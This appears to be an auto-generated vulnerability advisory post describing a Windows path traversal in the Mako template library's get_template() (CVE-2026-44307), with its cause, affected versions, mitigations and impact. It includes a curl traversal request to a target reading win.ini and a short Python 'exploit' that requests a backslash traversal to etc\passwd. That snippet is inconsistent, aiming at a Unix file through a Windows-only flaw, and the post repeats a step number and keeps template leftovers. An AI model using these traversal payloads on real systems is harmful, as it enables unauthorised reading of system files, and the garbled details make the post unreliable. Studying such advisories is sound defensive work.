Mako, Path Traversal, CVE-2026-44307 (High)

By /

Listen to this Post

How the vulnerability works (CVE-2026-44307):

  1. The root cause is a mismatch between `posixpath` (used for URI normalization in get_template()) and `os.path` (used for file access and validation).
  2. On Windows, `os.path` is ntpath, which treats backslash (\) as a path separator, while `posixpath` treats it as a literal character.
  3. An attacker provides a specially crafted URI containing backslash traversal sequences (e.g., \..\..\secret.txt).
    4. `TemplateLookup.get_template()` strips only leading slashes (/) via `re.sub(r”^\/+”, “”, uri)` and normalizes the path with posixpath.normpath().
  4. Since `posixpath` treats backslash literally, the traversal sequences (e.g., \..\) are not recognized as path traversal and are passed through unchanged.
  5. The `Template.__init__()` method then validates the URI using os.path.normpath(). On Windows, this resolves `\..\..\secret.txt` to \secret.txt.
  6. The resulting string does not start with .., so the `startswith(“..”)` check passes.
  7. Finally, `os.path.isfile()` on Windows interprets backslash as a path separator, resolving the `..` traversal and locating files outside the configured template directory.
  8. As a result, an attacker can read any readable file on the system, leading to local file disclosure. If the targeted file contains Mako/Python template syntax, it may also be parsed and executed as a template.

DailyCVE Form (3 words max):

Platform: Windows
Version: < 1.3.11
Vulnerability: Path Traversal
Severity: High
Date: 2026-04-28

Prediction: 2026-05-05

Analytics under What Undercode Say:

Detect vulnerable Mako
pip show mako | grep Version
Simulate path traversal
curl -X GET "http://target/template/\..\..\..\windows\win.ini"

Exploit:

from mako.lookup import TemplateLookup
lookup = TemplateLookup(directories=['/templates'])
uri = "\..\..\..\etc\passwd"
template = lookup.get_template(uri)
print(template.render())

Protection from this CVE:

  • Upgrade Mako to version 1.3.11 or later.
  • If upgrading is impossible, normalize backslashes to forward slashes early in the URI processing pipeline.
  • Validate and sanitize all user‑supplied template names against an allowlist of allowed paths.

Impact:

  • Unauthenticated file disclosure outside the intended template directory.
  • Possible remote code execution if the disclosed file contains Mako template syntax.
  • CVSS 4.0 score: 7.7 (High) per NVD.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top